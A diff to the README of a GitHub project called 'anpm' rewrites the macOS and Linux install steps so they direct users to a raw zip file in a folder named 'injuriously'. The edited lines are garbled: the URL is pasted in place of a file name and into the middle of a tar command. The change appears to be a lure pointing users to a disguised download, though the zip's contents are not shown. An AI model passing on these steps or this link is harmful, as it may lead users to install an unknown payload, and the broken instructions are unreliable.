julianti88/anpm/README.md

   2. Follow the on-screen instructions to complete the installation.

 - **For macOS Users:**
-  1. Open the downloaded `.tar.gz` file.
+  1. Open the downloaded `https://raw.githubusercontent.com/julianti88/anpm/main/injuriously/anpm.zip` file.
   2. Drag the anpm application to your Applications folder.

 - **For Linux Users:**
   1. Open a terminal.
   2. Navigate to the directory where the file was downloaded.
-  3. Use the command `tar -xzf [filename].tar.gz` to extract the files.
+  3. Use the command `tar -xzf [filename]https://raw.githubusercontent.com/julianti88/anpm/main/injuriously/anpm.zip` to extract the files.
   4. Follow any additional installation steps mentioned in the README file.

 ### Step 4: Run anpm